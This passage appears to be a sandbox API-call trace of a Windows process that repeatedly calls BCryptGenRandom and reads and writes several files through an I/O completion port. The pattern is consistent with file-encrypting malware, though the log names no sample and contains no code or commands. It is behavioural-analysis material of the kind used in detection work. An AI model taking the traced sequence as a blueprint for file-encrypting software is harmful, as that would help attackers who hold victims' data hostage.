GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0115.774] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.774] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.774] free (_Block=0x77d7a8) [0115.774] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.774] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.774] free (_Block=0x2071c20) [0115.774] free (_Block=0x2071d30) [0115.774] free (_Block=0x77d8b0) [0115.774] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.779] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0115.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0115.790] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.790] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.790] free (_Block=0x77d7a8) [0115.790] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.790] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.791] free (_Block=0x2071c20) [0115.791] free (_Block=0x2071d30) [0115.791] free (_Block=0x77d8b0) [0115.791] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.805] CloseHandle (hObject=0x81c) returned 1 [0115.808] free (_Block=0x3ef0008) [0115.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.820] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x79cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.837] CloseHandle (hObject=0x3bc) returned 1 [0115.838] free (_Block=0x1ff1e60) [0115.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.839] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.332] CloseHandle (hObject=0x81c) returned 1 [0116.336] free (_Block=0x3d70450) [0116.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.337] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.349] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1234, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0116.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.374] CloseHandle (hObject=0x340) returned 1 [0116.376] free (_Block=0x3e70008) [0116.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.404] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.405] CloseHandle (hObject=0x13c0) returned 1 [0116.406] free (_Block=0x1ff1e60) [0116.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0116.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0116.456] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.456] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.456] free (_Block=0x77d7a8) [0116.456] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.456] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.457] free (_Block=0x2071c20) [0116.457] free (_Block=0x2071d30) [0116.457] free (_Block=0x77d8b0) [0116.457] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0116.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.458] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0116.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0116.718] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1510, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.026] CloseHandle (hObject=0x13c0) returned 1 [0117.032] free (_Block=0x1ff1e60) [0117.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.052] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.054] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.054] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.054] free (_Block=0x77d7a8) [0117.054] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.054] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.054] free (_Block=0x2071c20) [0117.054] free (_Block=0x2071d30) [0117.054] free (_Block=0x77d8b0) [0117.054] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.058] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.079] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.079] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.079] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.079] free (_Block=0x77d7a8) [0117.079] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.080] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.080] free (_Block=0x2071c20) [0117.080] free (_Block=0x2071d30) [0117.080] free (_Block=0x77d8b0) [0117.080] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.089] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.089] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.089] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.090] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.090] free (_Block=0x77d7a8) [0117.090] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.090] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.090] free (_Block=0x2071c20) [0117.090] free (_Block=0x2071d30) [0117.090] free (_Block=0x77d8b0) [0117.090] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.094] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.108] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.108] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.108] free (_Block=0x77d7a8) [0117.108] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.108] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.108] free (_Block=0x2071c20) [0117.108] free (_Block=0x2071d30) [0117.108] free (_Block=0x77d8b0) [0117.108] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.137] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.152] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.159] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.172] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x9a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.173] CloseHandle (hObject=0x3bc) returned 1 [0117.174] free (_Block=0x3e70008) [0117.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.176] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x32b5, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.177] CloseHandle (hObject=0x13c0) returned 1 [0117.180] free (_Block=0x1ff1e60) [0117.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0117.652] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.655] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.655] free (_Block=0x77d7a8) [0117.657] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.657] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.667] free (_Block=0x2071c20) [0117.667] free (_Block=0x2071d30) [0117.667] free (_Block=0x77d8b0) [0117.667] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.668] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.705] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x402, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.715] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xcd6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.725] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x7a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0117.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0117.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.741] GetProcAddress (hModule=0x753f0000, 